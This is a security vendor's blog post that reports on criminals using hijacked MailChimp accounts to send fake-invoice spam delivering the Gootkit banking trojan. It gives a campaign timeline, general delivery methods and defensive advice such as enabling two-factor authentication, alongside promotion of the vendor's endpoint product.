An increasing number of hijacked MailChimp accounts are being used to distribute spam emails and malware. Here's what you need to know.
What's happening: Criminals are using compromised MailChimp accounts to blast spam emails designed to infect victims with malware.
Using MailChimp helps spam campaigns bypass email filters: Because MailChimp is such a well-established email marketing provider (the company has millions of customers and distributes more than 1 billion emails per day), it's less likely for these emails to get caught in spam filters.
Campaigns have been launching at an increasing rate since last November: Spam emails were first seen being distributed via compromised MailChimp accounts located in Australia in November 2017. Campaigns were next spotted in Italy in January, quickly followed by more campaigns launched from compromised UK and US companies in February and March.
Emails linking to fake invoice files: The majority of the emails are linking to .zip files that contain .js files, which in turn download the malware payload. Other examples leverage BITSAdmin, a legitimate Windows data-transfer tool, to download the payload.
The malware being distributed is primarily Gootkit, a sophisticated banking trojan:Gootkit has a long, successful history of stealing passwords and other sensitive information. It has a wide range of capabilities and is notorious for its ability to evade detection from antivirus software, sandboxes, and other security solutions.
It's unclear how MailChimp accounts are being compromised: Experts believe the most likely explanation is that criminals are taking advantage of weak, stolen, and/or reused passwords.
Barkly protects users from these attacks: Barkly blocks Gootkit and malware like it thanks to its uniquely accurate file analysis powered by machine learning.
Don't let user mistakes keep you up at night. Protect your company from the latest attacks with Barkly.
Criminals are always looking for new opportunities to distribute malware, and now they appear to be abusing MailChimp — one of the most popular email marketing service providers — to do it.
In the majority of campaigns, that malware has been Gootkit, a dangerous banking trojan outfitted with a variety of information-stealing capabilities (including keylogging, screen recording, and web injections) and notoriously designed for persistence and stealth.
Each campaign has introduced small variations, with criminals experimenting with different subject lines, body copy, and malware delivery mechanisms (for more details, see the timeline below). The criminals behind these campaigns are regularly iterating in order to further optimize their success rates, but the one thing they're not changing — the one thing that's definitively working — is sending these emails from compromised MailChimp accounts. Not only is it a "free" way for these criminals to amplify their reach, it's also helping them get them past email filters.
Why taking control of MailChimp accounts is a dangerous (and obvious) move for criminals
As a spammer, your general goal is obviously to get your emails in front of as many prospective victims as possible. That requires mass distribution, and one of the most tried-and-true options is renting access to a botnet (a network of compromised computers), and using it to send out your spam emails for you.
The upside of utilizing a botnet is it can seriously amplify your reach. For example, some of the most prevalent malware of the past few years (Locky ransomware and the Dridex banking trojan) both relied on distribution from the Necurs botnet in order to send out millions and millions of emails.
The downside, of course, is using a botnet costs money. It can also be surprisingly competitive.
The criminals behind these MailChimp campaigns have stumbled across an incredibly effective alternative. By compromising MailChimp customers — either by taking advantage of weak passwords or tricking users into handing them over via phishing attempts — criminals can use their accounts to blast out thousands and thousands of spam emails for them.
End result: In addition to hijacking the distribution power of MailChimp, these operations are reaping an additional benefit — unlike emails sent from botnets, these are being distributed via a trusted sender.
It's enough to make criminals ask themselves, who needs a botnet when you have compromised MailChimp accounts?
What these emails look like
As detailed in the timeline below, the emails being sent in these campaigns have varied slightly from day to day and week to week. In general, the vast majority have been disguised as invoice notifications, with links to hosted .zip files rather than those files being attached (additionally helping them bypass email filters).
As shown in the following two examples, the emails often appear to be coming "on behalf of" an individual/organization associated with the invoice, though in some cases, the sender email address isn't a direct match.
Fake invoice notice sent from AZ Homes List via a compromised MailChimp account. Source: My Online Security
Fake invoice notice sent from City Sign & Graphics, LTD via a compromised MailChimp account. Source: My Online Security
250,000 spam emails sent from one compromised account — what these hijacks look like from the MailChimp account owner's perspective
According to reports Knight has received, once criminals have gained access to a MailChimp account they either replace the victim's subscriber list with a list of their own target email addresses, or they simply upload the additional list of target email addresses so that both lists receive the spam campaign.
A comment left on My Online Security paints a more detailed picture:
My Mailchimp account got breached, no malware on any pc used to access the service, no login sharing, altough Two-Factor wasn’t setup (It is since the breach). I knew of the breach because my main admin got a notification email from Mailchimp at 2AM saying a 250k subscriber list was successfully imported (my normal list is of about 6k), so the attackers just import their own list into the breached account and sent it thorough there, and then just delete the sent campaign.
MailChimp account owners should be on high alert for any suspicious list uploads and/or email activity. To avoid having their accounts hijacked in the first place, experts are also urgently recommending account owners to utilize two-factor authentication (2FA). Instructions from MailChimp on enabling 2FA can be found here.
In these early cases, it appears the criminals were simply sending out spam emails to the compromised organizations' mailing lists. That's something that would change when new emails began being sent from compromised Italian organizations this January. In these campaigns, criminals appear to have avoided sending the spam emails to the organizations' mailing lists, choosing to upload their own list of email addresses, instead.
Instead of fake invoice notifications, the emails were disguised as Italian tax notices sent from the Ministero dell’Economia e delle Finanze.
A few days later, Knight began tracking new campaigns taking advantage of compromised UK and US organizations on My Online Security, noting for the first time that the malware being distributed was the Gootkit trojan.
On February 22, new campaigns were spotted being sent from organizations including Infinity Cottage and Cosmic Intelligence. In addition to including a link pointing to a .zip attachment, these emails also included a link to a macro-enabled Word document that downloaded a .scr file (which runs as an .exe on Windows computers).
Days later, on February 26 and 27, criminals were back at it, though they apparently decided to drop the second link to the Word document and go back to including just one link to a booby-trapped .zip file.
After a brief lull, new campaigns were launched on March 12, following what (for the moment, anyhow) appears to be a fairly stable pattern of fake invoice email --> link to .zip file containing .lnk file --> download Gootkit using bitsadmin.exe.
What to do now
This has unfortunately become a very active criminal operation that requires preventative action from all of us in order to make it go away.
MailChimp account owners:
If they haven't already, MailChimp users need to enable two-factor authentication (2FA) now. That will require anyone attempting to log in to an account to also submit a verification code often sent to a mobile device or separate email not associated with the account. As mentioned above, MailChimp has provided instructions for enabling 2FA here.
As the extent of this abuse continues to grow, MailChimp should also consider making 2FA enabled by default. That could potentially have a dramatic effect on reducing these attacks.
For the rest of us, the usual advice of informing end users about this threat and training them not to open attachments they're not expecting is key.
But companies can avoid putting all the pressure on employees by ensuring they're properly protected by modern endpoint protection designed to block even the newest malware antivirus solutions routinely miss.
Barkly blocks GootKit and other malware payloads before they can do any damage
Mistakes happen, and users routinely fall for spam and phishing emails, despite regular training. Barkly serves as an effective safety net for users, blocking the Gootkit samples being distributed in these campaigns before the malware can successfully execute.